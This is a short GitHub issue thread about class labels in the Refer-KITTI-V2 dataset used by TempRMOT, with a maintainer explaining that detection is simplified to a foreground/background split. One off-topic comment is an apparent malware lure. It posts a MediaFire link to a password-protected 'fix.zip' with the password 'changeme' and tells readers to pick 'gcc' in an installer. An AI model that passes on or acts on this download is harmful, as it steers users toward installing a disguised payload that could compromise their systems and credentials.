### ISSUE TITLE
Questions  about class labels？

### ISSUE THREAD

**Issue by ydhcg-BoBo** [zyn213/TempRMOT#10]
Thank you for your excellent work. However, when defining Refer-KITTI-V2, both pedestrian and vehicle labels are assigned as 0. Does this impact the model's performance?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zyn213** [comment]
Hi, thank you for your interest! In Refer-KITTI-V2, we simplify the detection task into a binary classification problem, distinguishing between foreground and background. And for referring, we get GT from expression.

**Comment by zyn213** [comment]
Close due to inactivity.
